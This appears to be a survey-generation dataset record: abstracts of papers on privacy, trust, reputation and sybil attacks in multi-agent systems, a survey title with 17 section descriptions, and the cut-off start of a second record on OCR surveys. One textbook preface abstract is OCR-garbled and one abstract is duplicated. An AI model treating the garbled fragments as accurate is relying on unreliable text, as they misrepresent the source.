--- paper_title: Partial identities as a foundation for trust and reputation paper_content: This paper explores the relationships between the hard security concepts of identity and privacy on the one hand, and the soft security concepts of trust and reputation on the other hand. We specifically focus on two vulnerabilities that current trust and reputation systems have: the change of identity and multiple identities problems. As a result, we provide a privacy preserving solution to these vulnerabilities which integrates the explored relationships among identity, privacy, trust and reputation. We also provide a prototype of our solution to these vulnerabilities and an application scenario. --- paper_title: Privacy-enhancing technologies: approaches and development paper_content: In this paper, we discuss privacy threats on the Internet and possible solutions to this problem. Examples of privacy threats in the communication networks are identity disclosure, linking data traffic with identity, location disclosure in connection with data content transfer, user profile disclosure or data disclosure itself. Identifying the threats and the technology that may be used for protection can provide satisfactory protection of privacy over general networks that are building today the information infrastructure. In general, these technologies are known as Privacy-Enhancing Technologies (PETs). This article analyses some of the key Privacy-Enhancing Technologies and provides a view on the on-going projects developing these technologies. --- paper_title: An agent infrastructure for privacy-enhancing agent-based e-commerce applications paper_content: Privacy is of crucial importance in order for agent-based e-commerce applications to be of broad use. Privacy can be enhanced minimizing data identifiability, i.e., the degree by which personal information can be directly attributed to a particular individual. However, minimizing data identifiability may directly impact other crucial issues in agent-based e-commerce, such as accountability, trust, and reputation. In this paper, we present an agent infrastructure for agent-based e-commerce applications. This agent infrastructure enhances privacy without compromising accountability, trust, and reputation.
--- paper_title: Network Security Essentials: Applications and Standards paper_content: From the Book: ::: PREFACE: Preface In this age of electronic connectivity, of viruses and hackers, of electronic eavesdropping and electronic fraud, network security has assumed increasing importance. Two trends have come together to make the topic of this book of vital interest. First, the explosive growth in computer systems and their interconnections via networks has increased the dependence of both organizations and individuals on the information stored and communicated using these systems. This, in turn, has led to a heightened awareness of the need to protect data and resources from disclosure, to guarantee the authenticity of data and messages, and to protect systems from network-based attacks. Second, the disciplines of cryptography and network security have matured, leading to the development of practical, readily available applications to enforce network security. Objectives It is the purpose of this book to provide a practical survey of network security applications and standards. The emphasis is on applications that are widely used on the Internet and for corporate networks, and on standards, especially Internet standards, that have been widely deployed. Intended Audience The book is intended for both an academic and a professional audience. As a textbook, it is intended as a one-semester undergraduate course on network security for computer science, computer engineering, and electrical engineering majors. The book also serves as a basic reference volume and is suitable for self-study. Plan of the Book The book is organized in three parts: I. Cryptography: A concise survey of the cryptographic algorithms and protocols i reportunderlyingnetwork security applications, including encryption, hash functions, digital signatures, and key exchange. i See Appen~ II. Network Security Applications: Covers important network security tools and applications, including Kerberos, X.509v3 certificates, PGP, S/MIME, IP Secu- rity, SSL/TLS, SET, and SNMPv3. III. System Security: Looks at system-level security issues, including the threat of and countermeasures for intruders and viruses, and the use of firewalls and trusted systems. This book i A more detailed, chapter-by-chapter summary appears at the end of Chapter ~ (CNS2e). 1. In addition, the book includes an extensive glossary, a list of frequently used detailed an< acronyms, and a bibliography. There are also end-of-chapter problems and sugges- of which co tions for further reading. dards (NSE 3. NSE1e in covers SNh Internet Services for Instructors and Students There is a Web page for this book that provides support for students and instruc tors. The page includes links to relevant sites, transparency masters of figures in the book in PDF (Adobe Acrobat) format, and sign-up information for the book's Internet mailing list. The Web page is at ... --- paper_title: Enforcing security in the AgentScape middleware paper_content: Multi Agent Systems (MAS) provide a useful paradigm for accessing distributed resources in an autonomic and self-directed manner. Resources, such as web services, are increasingly becoming available in large distributed environments. Currently, numerous multi agent systems are available. However, for the multi agent paradigm to become a genuine mainstream success certain key features need to be addressed: the foremost being security. 
--- paper_title: Authentication for Humans paper_content: To authenticate something in the Internet is to verify that its identity is as claimed. Unless the identity itself is meaningful and the user is presented with evidence to support the claim of identity there can be no authentication. Many efforts to implement authentication seem to forget this and only focus on the cryptographic authentication mechanisms. We describe what is needed in addition to cryptography for authentication to be meaningful to humans, and illustrate this by showing how it can be applied in the Web and WAP architectures.
--- paper_title: On agent technology for e-commerce: trust, security and legal issues paper_content: The vision of future electronic marketplaces (e-markets) is that of markets being populated by autonomous intelligent entities—software, trading, e-agents—representing their users or owners and conducting business on their behalf. For this vision to materialize, one fundamental issue that needs to be addressed is that of trust. First, users need to be able to trust that the agents will do what they say they do. Second, they need to be confident that their privacy is protected and that the security risks involved in entrusting agents to perform transactions on their behalf are minimized. Finally, users need to be assured that any legal issues relating to agents trading electronically are fully covered as they are in traditional trading practices. In this paper we consider the barriers for the adoption of agent technology in electronic commerce (e-commerce) which pertain to trust, security and legal issues. We discuss the perceived risks of the use of agents in e-commerce and the fundamental issue of trust in this context. Issues regarding security, and how some of these can be addressed through the use of cryptography, are described. The impact of the use of agent technology on the users' privacy and how it can be both protected as well as hindered by it is also examined. Finally, we discuss the legal issues that arise in agent-mediated e-commerce and discuss the idea of attributing to software agents the status of legal persons or e-persons and the various implications. --- paper_title: Review on Computational Trust and Reputation Models paper_content: The scientific research in the area of computational mechanisms for trust and reputation in virtual societies is a recent discipline oriented to increase the reliability and performance of electronic communities. Computer science has moved from the paradigm of isolated machines to the paradigm of networks and distributed computing.
Likewise, artificial intelligence is quickly moving from the paradigm of isolated and non-situated intelligence to the paradigm of situated, social and collective intelligence. The new paradigm of the so called intelligent or autonomous agents and multi-agent systems (MAS) together with the spectacular emergence of the information society technologies (specially reflected by the popularization of electronic commerce) are responsible for the increasing interest on trust and reputation mechanisms applied to electronic societies. This review wants to offer a panoramic view on current computational trust and reputation models. --- paper_title: A Survey of Trust and Reputation Systems for Online Service Provision paper_content: Trust and reputation systems represent a significant trend in decision support for Internet mediated service provision. The basic idea is to let parties rate each other, for example after the completion of a transaction, and use the aggregated ratings about a given party to derive a trust or reputation score, which can assist other parties in deciding whether or not to transact with that party in the future. A natural side effect is that it also provides an incentive for good behaviour, and therefore tends to have a positive effect on market quality. Reputation systems can be called collaborative sanctioning systems to reflect their collaborative nature, and are related to collaborative filtering systems. Reputation systems are already being used in successful commercial online applications. There is also a rapidly growing literature around trust and reputation systems, but unfortunately this activity is not very coherent. The purpose of this article is to give an overview of existing and proposed systems that can be used to derive measures of trust and reputation for Internet transactions, to analyse the current trends and developments in this area, and to propose a research agenda for trust and reputation systems. --- paper_title: Challenges for Robust Trust and Reputation Systems paper_content: The purpose of trust and reputation systems is to strengthen the quality of markets and communities by providing an incentive for good behaviour and quality services, and by sanctioning bad behaviour and low quality services. However, trust and reputation systems will only be able to produce this effect when they are sufficiently robust against strategic manipulation or direct attacks. Currently, robustness analysis of TRSs is mostly done through simple simulated scenarios implemented by the TRS designers themselves, and this can not be considered as reliable evidence for how these systems would perform in a realistic environment. In order to set robustness requirements it is important to know how important robustness really is in a particular community or market. This paper discusses research challenges for trust and reputation systems, and proposes a research agenda for developing sound and reliable robustness principles and mechanisms for trust and reputation systems. --- paper_title: SybilGuard: defending against sybil attacks via social networks paper_content: Peer-to-peer and other decentralized, distributed systems are known to be particularly vulnerable to sybil attacks. In a sybil attack, a malicious user obtains multiple fake identities and pretends to be multiple, distinct nodes in the system. 
By controlling a large fraction of the nodes in the system, the malicious user is able to "out vote" the honest users in collaborative tasks such as Byzantine failure defenses. This paper presents SybilGuard, a novel protocol for limiting the corruptive influences of sybil attacks. Our protocol is based on the "social network" among user identities, where an edge between two identities indicates a human-established trust relationship. Malicious users can create many identities but few trust relationships. Thus, there is a disproportionately small "cut" in the graph between the sybil nodes and the honest nodes. SybilGuard exploits this property to bound the number of identities a malicious user can create. We show the effectiveness of SybilGuard both analytically and experimentally. --- paper_title: Smart cheaters do prosper: Defeating trust and reputation systems paper_content: Traders in electronic marketplaces may behave dishonestly, cheating other agents. A multitude of trust and reputation systems have been proposed to try to cope with the problem of cheating. These systems are often evaluated by measuring their performance against simple agents that cheat randomly. Unfortunately, these systems are not often evaluated from the perspective of security---can a motivated attacker defeat the protection? Previously, it was argued that existing systems may suffer from vulnerabilities that permit effective, profitable cheating despite the use of the system. In this work, we experimentally substantiate the presence of these vulnerabilities by successfully implementing and testing a number of such 'attacks', which consist only of sequences of sales (honest and dishonest) that can be executed in the system. This investigation also reveals two new, previously-unnoted cheating techniques. Our success in executing these attacks compellingly makes a key point: security must be a central design goal for developers of trust and reputation systems. --- paper_title: The Social Cost of Cheap Pseudonyms paper_content: We consider the problems of societal norms for cooperation and reputation when it is possible to obtain cheap pseudonyms, something that is becoming quite common in a wide variety of interactions on the Internet. This introduces opportunities to misbehave without paying reputational consequences. A large degree of cooperation can still emerge, through a convention in which newcomers "pay their dues" by accepting poor treatment from players who have established positive reputations. One might hope for an open society where newcomers are treated well, but there is an inherent social cost in making the spread of reputations optional.
We prove that no equilibrium can sustain significantly more cooperation than the dues-paying equilibrium in a repeated random matching game with a large number of players in which players have finite lives and the ability to change their identities, and there is a small but nonvanishing probability of mistakes. Although one could remove the inefficiency of mistreating newcomers by disallowing anonymity, this is not practical or desirable in a wide variety of transactions. We discuss the use of entry fees, which permits newcomers to be trusted but excludes some players with low payoffs, thus introducing a different inefficiency. We also discuss the use of free but unreplaceable pseudonyms, and describe a mechanism that implements them using standard encryption techniques, which could be practically implemented in electronic transactions. Copyright (c) 2001 Massachusetts Institute of Technology. --- paper_title: Trust in multi-agent systems paper_content: Trust is a fundamental concern in large-scale open distributed systems. It lies at the core of all interactions between the entities that have to operate in such uncertain and constantly changing environments. Given this complexity, these components, and the ensuing system, are increasingly being conceptualised, designed, and built using agent-based techniques and, to this end, this paper examines the specific role of trust in multi-agent systems. In particular, we survey the state of the art and provide an account of the main directions along which research efforts are being focused. In so doing, we critically evaluate the relative strengths and weaknesses of the main models that have been proposed and show how, fundamentally, they all seek to minimise the uncertainty in interactions. Finally, we outline the areas that require further research in order to develop a comprehensive treatment of trust in complex computational settings. --- paper_title: Sybilproof reputation mechanisms paper_content: Due to the open, anonymous nature of many P2P networks, new identities - or sybils - may be created cheaply and in large numbers. Given a reputation system, a peer may attempt to falsely raise its reputation by creating fake links between its sybils. Many existing reputation mechanisms are not resistant to these types of strategies.Using a static graph formulation of reputation, we attempt to formalize the notion of sybilproofness. We show that there is no symmetric sybilproof reputation function. For nonsymmetric reputations, following the notion of reputation propagation along paths, we give a general asymmetric reputation function based on flow and give conditions for sybilproofness. --- paper_title: A survey of attack and defense techniques for reputation systems paper_content: Reputation systems provide mechanisms to produce a metric encapsulating reputation for a given domain for each identity within the system. These systems seek to generate an accurate assessment in the face of various factors including but not limited to unprecedented community size and potentially adversarial environments. We focus on attacks and defense mechanisms in reputation systems. We present an analysis framework that allows for the general decomposition of existing reputation systems. We classify attacks against reputation systems by identifying which system components and design choices are the targets of attacks. We survey defense mechanisms employed by existing reputation systems. 
Finally, we analyze several landmark systems in the peer-to-peer domain, characterizing their individual strengths and weaknesses. Our work contributes to understanding (1) which design components of reputation systems are most vulnerable, (2) what are the most appropriate defense mechanisms and (3) how these defense mechanisms can be integrated into existing or future reputation systems to make them resilient to attacks. --- paper_title: Review on Computational Trust and Reputation Models paper_content: The scientific research in the area of computational mechanisms for trust and reputation in virtual societies is a recent discipline oriented to increase the reliability and performance of electronic communities. Computer science has moved from the paradigm of isolated machines to the paradigm of networks and distributed computing. Likewise, artificial intelligence is quickly moving from the paradigm of isolated and non-situated intelligence to the paradigm of situated, social and collective intelligence. The new paradigm of the so-called intelligent or autonomous agents and multi-agent systems (MAS), together with the spectacular emergence of the information society technologies (especially reflected by the popularization of electronic commerce), is responsible for the increasing interest in trust and reputation mechanisms applied to electronic societies. This review aims to offer a panoramic view of current computational trust and reputation models. --- paper_title: Privacy and contextual integrity: framework and applications paper_content: Contextual integrity is a conceptual framework for understanding privacy expectations and their implications developed in the literature on law, public policy, and political philosophy. We formalize some aspects of contextual integrity in a logical framework for expressing and reasoning about norms of transmission of personal information. In comparison with access control and privacy policy frameworks such as RBAC, EPAL, and P3P, these norms focus on who personal information is about, how it is transmitted, and past and future actions by both the subject and the users of the information. Norms can be positive or negative depending on whether they refer to actions that are allowed or disallowed. Our model is expressive enough to capture naturally many notions of privacy found in legislation, including those found in HIPAA, COPPA, and GLBA.
A number of important problems regarding compliance with privacy norms, future requirements associated with specific actions, and relations between policies and legal standards reduce to standard decision procedures for temporal logic. --- paper_title: Open issues for normative multi-agent systems paper_content: A challenging problem currently addressed in the multi-agent systems area is the development of open systems; which are characterized by the heterogeneity of their participants and the dynamic features of both their participants and their environment. The main feature of agents in these systems is autonomy. It is this autonomy that requires regulation, and norms are a solution for this. Norms represent a tool for achieving coordination and cooperation among the members of a society. They have been employed in the field of Artificial Intelligence as a formal specification of deontic statements aimed at regulating the actions of software agents and the interactions among them. This article gives an overview of the most relevant works on norms for multi-agent systems. This review considers open multi-agent systems challenges and points out the main open questions that remain in norm representation, reasoning, creation, and implementation. --- paper_title: Introduction to Normative Multiagent Systems paper_content: In this paper we use recursive modelling to formalize sanction-based obligations in a qualitative game theory. In particular, we formalize an agent who attributes mental attitudes such as goals and desires to the normative system which creates and enforces its obligations. The wishes (goals, desires) of the normative system are the commands (obligations) of the agent. Since the agent is able to reason about the normative system’s behavior, our model accounts for many ways in which an agent can violate a norm believing that it will not be sanctioned. The theory can be used in theories or applications that need a model of rational decision making in normative multiagent systems, such as for example theories of fraud and deception, trust dynamics and reputation, electronic commerce, and virtual communities. --- paper_title: Agent Technology for e-Commerce paper_content: List of Figures. List of Tables. Preface. 1 Introduction. 1.1 A paradigm shift. 1.2 Electronic commerce. 1.3 Agents and e-commerce. 1.4 Further reading. 1.5 Exercises and topics for discussion. 2 Software agents. 2.1 Characteristics of agents. 2.2 Agents as intentional systems. 2.3 Making decisions. 2.4 Planning. 2.5 Learning. 2.6 Agent architectures. 2.7 Agents in perspective. 2.8 Methodologies and languages. 2.9 Further reading. 2.10 Exercises and topics for discussion. 3 Multi-agent systems. 3.1 Characteristics of multi-agent systems. 3.2 Interaction. 3.3 Agent communication. 3.4 Ontologies. 3.5 Cooperative problem solving. 3.6 Virtual organisations as multi-agent systems. 3.7 Infrastructure requirements for open multi-agent systems. 3.8 Further reading. 3.9 Exercises and topics for discussion. 4 Shopping Agents. 4.1 Consumer buying behaviour model. 4.2 Comparison shopping. 4.3 Working for the user. 4.4 How shopping agents work. 4.5 Limitations and issues. 4.6 Further reading. 4.7 Exercises and topics for discussion. 5 Middle agents. 5.1 Matching. 5.2 Classification of middle agents. 5.3 Describing capabilities. 5.4 LARKS. 5.5 OWL-S. 5.6 Further reading. 5.7 Exercises and topics for discussion. 6 Recommender systems. 6.1 Information needed. 6.2 Providing recommendations. 6.3 Recommendation technologies. 
6.4 Content-based filtering. 6.5 Collaborative filtering. 6.6 Combining content and collaborative filtering. 6.7 Recommender systems in e-commerce. 6.8 A note on personalization. 6.9 Further reading. 6.10 Exercises and topics for discussion. 7 Elements of strategic interaction. 7.1 Elements of Economics. 7.2 Elements of Game Theory. 7.3 Further reading. 7.4 Exercises and topics for discussion. 8 Negotiation I. 8.1 Negotiation protocols. 8.2 Desired properties of negotiation protocols. 8.3 Abstract architecture for negotiating agents. 8.4 Auctions. 8.5 Classification of auctions. 8.6 Basic auction formats. 8.7 Double auctions. 8.8 Multi-attribute auctions. 8.9 Combinatorial auctions. 8.10 Auction platforms. 8.11 Issues in practical auction design. 8.12 Further reading. 8.13 Exercises and topics for discussion. 9 Negotiation II. 9.1 Bargaining. 9.2 Negotiation in different domains. 9.3 Coalitions. 9.4 Applications of coalition formation. 9.5 Social choice problems. 9.6 Argumentation. 9.7 Further reading. 9.8 Exercises and topics for discussion. 10 Mechanism design. 10.1 The mechanism design problem. 10.2 Dominant strategy implementation. 10.3 The Gibbard-Satterthwaite Impossibility Theorem. 10.4 The Groves-Clarke mechanisms. 10.5 Mechanism design and computational issues. 10.6 Further reading. 10.7 Exercises and topics for discussion. 11 Mobile agents. 11.1 Introducing mobility. 11.2 Facilitating mobility. 11.3 Mobile agent systems. 11.4 Aglets. 11.5 Mobile agent security. 11.6 Issues on mobile agents. 11.7 Further reading. 11.8 Exercises and topics for discussion. 12 Trust, security and legal issues. 12.1 Perceived risks. 12.2 Trust. 12.3 Trust in e-commerce. 12.4 Electronic institutions. 12.5 Reputation systems. 12.6 Security. 12.7 Cryptography. 12.8 Privacy, anonymity and agents. 12.9 Agents and the law. 12.10 Agents as legal persons. 12.11 Closing remarks. 12.12 Further reading. 12.13 Exercises and topics for discussion. A Introduction to decision theory. A.2 Making decisions. A.3 Utilities. A.4 Further reading. Bibliography. Index. --- paper_title: Specifying standard security mechanisms in multi-agent systems paper_content: Distributed multi-agent systems propose new infrastructure solutions to support the interoperability of electronic services. Security is a central issue for such infrastructures and is compounded by their intrinsic openness, heterogeneity and because of the autonomous and potentially self-interested nature of the agents therein. This article reviews the work that the FIPA agent standards body has undertaken to specify security in multi-agent systems. This enables a discussion about the main issues that developers have to face at different levels (i.e., intra-platform, inter-platform and application level) when developing agent-based security solutions in various domains. --- paper_title: Privacy enhancing identity management: protection against re-identification and profiling paper_content: User centric identity management will be necessary to protect user's privacy in an electronic society. However, designing such systems is a complex task, as the expectations of the different parties involved in electronic transactions have to be met. In this work we give an overview on the actual situation in user centric identity management and point out problems encountered there. Especially we present the current state of research and mechanisms useful to protect the user's privacy. 
Additionally we show security problems that have to be borne in mind while designing such a system and point out possible solutions. Thereby, we concentrate on attacks on linkability and identifiability, and possible protection methods. --- paper_title: Privacy and Identity Management paper_content: Creating and managing individual identities is a central challenge of the digital age. As identity management systems defined here as programs or frameworks that administer the collection, authentication, or use of identity and information linked to identity are implemented in both the public and private sectors, individuals are required to identify themselves with increasing frequency. Traditional identity management systems are run by organizations that control all mechanisms for authentication (establishing confidence in an identity claim's truth) and authorization (deciding what an individual should be allowed to do), as well as any behind-the-scenes profiling or scoring of individuals. Recent work has looked toward more user-centric models that attempt to put individuals in charge of when, where, how, and to whom they disclose their personal information. --- paper_title: The Wiki Way: Quick Collaboration on the Web paper_content: Foreword. Preface. Why This Book? Why You Want to Read This. Book Structure. The Authors. Contributors and Colleagues. Errata and Omissions. Contacting Us. Read the Book, Use the Wiki! I. FROM CONCEPTS TO USING WIKI. 1. Introduction to Discussion and Collaboration Servers. In this Chapter. Collaboration and Discussion Tools. Collaboration Models. Who Uses Collaborative Discussion Servers? Whatever For? Features of a Web-Based Collaboration. On the Horizon: WebDAV. Comparing Wiki to Other Collaboration Tools. 2. What's a "Wiki"? The Wiki Concept. The Essence of Wiki. The User Experience. Usefulness Criteria. Wiki Basics. Wiki Clones. Wiki Implementations by Language. Other Wiki Offerings. Non-Wiki Servers. Wiki Application. Pros and Cons of a Wiki-Style Server. Why Consider Setting Up a Wiki? Other Issues. 3. Installing Wiki. QuickiWiki--Instant Serve. Installing Perl. Installing QuickiWiki. Multiple Instances. Wiki and Webserver. Wiki on IIS or PWS. The Apache Webserver. Installing Apache. Reconfiguring Apache. Testing Webserver Wiki. Wrapper Scripts. General Security Issues. Security and Database Integrity. Server Vulnerabilities. Addressing wiki Vulnerabilities. Configuring Your Browser Client. Fonts, Size and Layout. 4. Using Wiki. In this Chapter. Quicki Quick-Start. A Virtual Notebook. Making Wiki Notes, A Walkthrough. Wiki as PIM. A Working Example. The Content Model. Internal and External Hyperlink Models. Browsing Pages. Editing Pages. The Browser Editing Model. Building Wiki Content. Editing and Markup Conventions. 5. Structuring Wiki Content. In this Chapter. Wiki Structure. Structure Types. Only a Click Away. How Hard to Try. When to Impose Structure. When Not to Impose Structure. What is the Purpose of the Wiki? Structure Patterns. When to Spin Off New Wiki Servers. II. UNDERSTANDING THE HACKS. 6. Customizing Your Wiki. In this Chapter. Hacking Your Wiki Source. Copyright and Open Source License Policy. Why Customize? What to Customize. 7. Wiki Components Examined. In this Chapter. Dissecting QuickiWiki. QuickiWiki Component Model. Core QuickiWiki Modules. Sever Component. Optional Extended Components. Analyzing Page Content. Managing User Access. 8. Alternatives and Extensions. Parsing the Requests. ClusterWiki Component Model. The Library Module. 
Special Features. Spell Checking. Uploading Files. A Standard Wiki? 9. Wiki Administration and Tools. In this Chapter. Events History. Tracking Page Edits. Usage Statistics. Abuse Management. Access Management. Permission Models. Adding Authentication and Authorization. Administering the Database. Page Conversions. Page Management. Backup Issues. Server Resources and Wiki Loading. Avoiding User Waits. Implementing Wiki Constraints. Debugging a Wiki. Programming Resources. Backups. Low-Tech Debugging. Higher-Level Debugging. III. IMAGINE THE POSSIBILITIES. 10. Insights and Other Voices. In this Chapter. Wiki Culture. Wiki as Open Community. Writing Style Contention. Why Wiki Works. The Open-Edit Issue. When Wiki Doesn't Work. Public Wiki Issues. Wiki Style Guidelines. Notifying About Update. Design and Portability. Wiki Trade-Offs. Portability. The Future of Wiki. 11. Wiki Goes Edu. In this Chapter. CoWeb at Georgia Tech. Introduction to CoWeb. CoWeb Usage. Supported CoWeb User Roles. CoWeb Open Authoring Projects. Overall Conclusions. 12. Wiki at Work. In this Chapter. Case Studies. WikiWikiWeb. New York Times Digital. TWiki at TakeFive. TWiki at Motorola. Kehei Wiki Case Studies. A Rotary Wiki. Wiki Workplace Essentials. Why a Workplace Wiki? Planning the Wiki. Selection Stage. Implementation Stage. Day-to-Day Operations. Appendix A: Syntax Comparisons. Hyperlink Anchors. Markup Conventions. Escaped Blocks. HTML Tag Inclusion. Other Syntax Extensions Seen. Appendix B: Wiki Resources. Book Resources. Internet Resources. Appendix C: List of Tips. Index. 020171499XTO5232001 --- paper_title: Information revelation and privacy in online social networks paper_content: Participation in social networking sites has dramatically increased in recent years. Services such as Friendster, Tribe, or the Facebook allow millions of individuals to create online profiles and share personal information with vast networks of friends - and, often, unknown numbers of strangers. In this paper we study patterns of information revelation in online social networks and their privacy implications. We analyze the online behavior of more than 4,000 Carnegie Mellon University students who have joined a popular social networking site catered to colleges. We evaluate the amount of information they disclose and study their usage of the site's privacy settings. We highlight potential attacks on various aspects of their privacy, and we show that only a minimal percentage of users changes the highly permeable privacy preferences. --- paper_title: Designing Virtual Organizations paper_content: Virtual Organizations are a suitable mechanism for enabling coordination of heterogeneous agents in open environments. Taking into account many concepts of the Human Organization Theory, a model for Virtual Organizations has been developed. This model describes the structural, functional, normative and environmental aspects of the system. It is based on four main concepts: organizational unit, service, norm and environment. All these concepts have been applied in a case-study example for the management of a travel agency system. --- paper_title: Privacy-Preserving Query Answering in Logic-based Information Systems paper_content: We study privacy guarantees for the owner of an information system who wants to share some of the information in the system with clients while keeping some other information secret. The privacy guarantees ensure that publishing the new information will not compromise the secret one. 
We present a framework for describing privacy guarantees that generalises existing probabilistic frameworks in relational databases. We also formulate different flavors of privacy-preserving query answering as novel, purely logic-based reasoning problems and establish general connections between these reasoning problems and the probabilistic privacy guarantees. --- paper_title: To join or not to join: the illusion of privacy in social networks with mixed public and private user profiles paper_content: In order to address privacy concerns, many social media websites allow users to hide their personal profiles from the public. In this work, we show how an adversary can exploit an online social network with a mixture of public and private user profiles to predict the private attributes of users. We map this problem to a relational classification problem and we propose practical models that use friendship and group membership information (which is often not hidden) to infer sensitive attributes. The key novel idea is that in addition to friendship links, groups can be carriers of significant information. We show that on several well-known social media sites, we can easily and accurately recover the information of private-profile users. To the best of our knowledge, this is the first work that uses link-based and group-based classification to study privacy implications in social networks with mixed public and private user profiles. --- paper_title: Privacy-Preserving Data Publishing paper_content: Privacy is an important issue when one wants to make use of data that involves individuals' sensitive information. Research on protecting the privacy of individuals and the confidentiality of data has received contributions from many fields, including computer science, statistics, economics, and social science. In this paper, we survey research work in privacy-preserving data publishing. This is an area that attempts to answer the problem of how an organization, such as a hospital, government agency, or insurance company, can release data to the public without violating the confidentiality of personal information. We focus on privacy criteria that provide formal safety guarantees, present algorithms that sanitize data to make it safe for release while preserving useful information, and discuss ways of analyzing the sanitized data. Many challenges still remain. This survey provides a summary of the current state-of-the-art, based on which we expect to see advances in years to come. --- paper_title: Deriving Private Information from Association Rule Mining Results paper_content: Data publishing can provide enormous benefits to the society. However, due to privacy concerns, data cannot be published in their original forms. Two types of data publishing can address the privacy issue: one is to publish the sanitized version of the original data, and the other is to publish the aggregate information from the original data, such as data mining results. There have been extensive studies to understand the privacy consequence in the first approach, but there is not much investigation on the privacy consequence of publishing data mining results, although, it is well believed that publishing data mining results can lead to the disclosure of private information. We propose a systematic method to study the privacy consequence of data mining results. 
Based on a well-established theory, the principle of maximum entropy, we have developed a method to precisely quantify the privacy risk when data mining results are published. We take the association rule mining as an example in this paper, and demonstrate how we quantify the privacy risk based on the published association rules. We have conducted experiments to evaluate the effectiveness and performance of our method. We have drawn several interesting observations from our experiments. ---
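The last reference above studies how publishing association-rule mining results can leak private information. As a rough illustration of that general idea only (not the paper's maximum-entropy method), the following Python sketch shows how an attacker who knows some non-sensitive attributes of a record can read a posterior belief about a sensitive value directly off the confidence of a published rule; the rules, attribute names and numbers here are all invented.

```python
# Hypothetical published association rules: (antecedent, consequent, support, confidence)
rules = [
    ({"age=30-39", "zip=4711"}, "diagnosis=D", 0.04, 0.85),
    ({"age=30-39"},             "diagnosis=D", 0.09, 0.30),
]
prior = 0.10  # assumed overall frequency of the sensitive value in the published table

def posterior_belief(known_attrs, sensitive, rules, prior):
    """Attacker's estimate of P(sensitive | known attributes) from published rules."""
    applicable = [conf for ante, cons, sup, conf in rules
                  if cons == sensitive and ante <= known_attrs]
    return max(applicable, default=prior)   # best matching rule, else fall back to the prior

known = {"age=30-39", "zip=4711", "country=SE"}   # what the attacker knows about one person
p = posterior_belief(known, "diagnosis=D", rules, prior)
print(f"posterior belief = {p:.2f}, lift over prior = {p / prior:.1f}x")
```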
Title: A Survey of Privacy in Multi-Agent Systems Section 1: Introduction Description 1: Introduce the topic of privacy in multi-agent systems and the importance of safeguarding personal information within these systems. Section 2: Protection against Information Collection Description 2: Discuss mechanisms and strategies for preventing the unwanted collection of sensitive information by agents in multi-agent systems. Section 3: Disclosure Decision Making Description 3: Detail various approaches for agents to decide which information to disclose to other agents, including policy-based and privacy-utility tradeoff methods. Section 4: Secure Data Transfer and Storage Description 4: Explain the importance of securing information transfer and storage to protect privacy and review existing mechanisms in agent platforms. Section 5: Trusted Third Party Computation Description 5: Explore how trusted third parties can mediate information sharing to prevent direct information collection by destination agents. Section 6: Protection against Information Processing Description 6: Survey strategies to minimize and secure the processing of collected information to protect privacy. Section 7: Anonymity Description 7: Define anonymity in the context of multi-agent systems and discuss protocols and technologies that support anonymous communication and problem-solving. Section 8: Anonymity in Multi-agent Problem Solving Description 8: Review algorithms and approaches that ensure anonymity during distributed problem-solving among agents. Section 9: Anonymizers Description 9: Explore technologies like MIX networks and onion routing that anonymize agent communications and prevent traffic analysis. Section 10: Pseudonymity Description 10: Examine the use of pseudonyms to preserve privacy and discuss ad-hoc mechanisms and platform support for pseudonym management. Section 11: Implications in Security Description 11: Discuss how security measures such as authentication and accountability can impact privacy and describe solutions to balance these aspects. Section 12: Implications in Trust and Reputation Description 12: Investigate the role of trust and reputation models in multi-agent systems and how they can support privacy preservation. Section 13: Summary of Proposals against Information Collection Description 13: Summarize the approaches and mechanisms aiming to prevent undesired information collection in multi-agent systems. Section 14: Summary of Proposals against Information Processing Description 14: Summarize the approaches and mechanisms aiming to minimize and protect the processing of sensitive information. Section 15: Protection against Information Dissemination Description 15: Outline strategies based on trust, reputation, and norms to prevent unauthorized dissemination of collected information. Section 16: Open Challenges Description 16: Identify future research directions and open challenges in the field of privacy preservation in multi-agent systems. Section 17: Conclusions Description 17: Conclude the survey by summarizing the key points and emphasizing the importance of incorporating privacy preservation mechanisms in multi-agent systems.
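Section 9 of the outline above mentions anonymizers such as MIX networks and onion routing. The Python sketch below (it requires the third-party cryptography package) illustrates only the layered-encryption idea behind such relays, under strong simplifying assumptions: three hypothetical relays, symmetric Fernet keys assumed to be shared in advance rather than negotiated with public-key cryptography, and no batching, padding or reordering.

```python
from cryptography.fernet import Fernet

# Hypothetical three-hop route; each relay holds one symmetric key.
route = ["relay_a", "relay_b", "relay_c"]
keys = {hop: Fernet.generate_key() for hop in route}

def wrap(message: bytes) -> bytes:
    """Encrypt in reverse route order so the first relay peels the outermost layer."""
    onion = message
    for hop in reversed(route):
        onion = Fernet(keys[hop]).encrypt(onion)
    return onion

def unwrap(onion: bytes) -> bytes:
    """Each relay removes exactly one layer and forwards the rest."""
    for hop in route:
        onion = Fernet(keys[hop]).decrypt(onion)
    return onion

onion = wrap(b"query from a pseudonymous agent")
print(unwrap(onion))   # b'query from a pseudonymous agent'
```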
A Survey on Optical Character Recognition System
9
--- paper_title: Survey and bibliography of Arabic optical text recognition paper_content: Research work on Arabic optical text recognition (AOTR), although lagging that of other languages, is becoming more intensive than before and commercial systems for AOTR are becoming available. This paper presents a comprehensive survey and bibliography of research on AOTR, by covering all the research publications on AOTR to which the authors had access. This paper introduces the general topic of optical character recognition (OCR), and highlights the characteristics of Arabic text. It also presents an historical review of the Arabic text recognition systems. Further, this paper reports on the state of the art in AOTR research, and lists the specifications of commercially available systems for AOTR. In this paper, we first underline the capabilities of different AOTR systems, and then introduce a five stage model for AOTR systems and classify research work according to this model. We devote a section to each of the stages of this model: preprocessing, segmentation, feature extraction, classification, and post-processing. In the preprocessing section, we emphasize handling degraded documents, and thinning of Arabic text. In the segmentation section, we discuss methods of segmenting Arabic text and categorize the methods into five general approaches. In the feature extraction and classification sections, we highlight the main techniques and analyze AOTR research works based on those techniques. We then discuss approaches for post-processing and show their relation to the Arabic language. We conclude by pointing out problems and directions for future research on AOTR. --- paper_title: Automatic Number Plate Recognition System for Vehicle Identification Using Optical Character Recognition paper_content: Automatic Number Plate Recognition (ANPR) is an image processing technology which uses the number (license) plate to identify the vehicle. The objective is to design an efficient automatic authorized vehicle identification system by using the vehicle number plate. The system is implemented at the entrance for security control of a highly restricted area like military zones or the area around top government offices, e.g. Parliament, Supreme Court, etc. The developed system first detects the vehicle and then captures the vehicle image. The vehicle number plate region is extracted using image segmentation. An optical character recognition technique is used for the character recognition. The resulting data are then compared with the records in a database so as to come up with specific information like the vehicle’s owner, place of registration, address, etc. The system is implemented and simulated in Matlab, and its performance 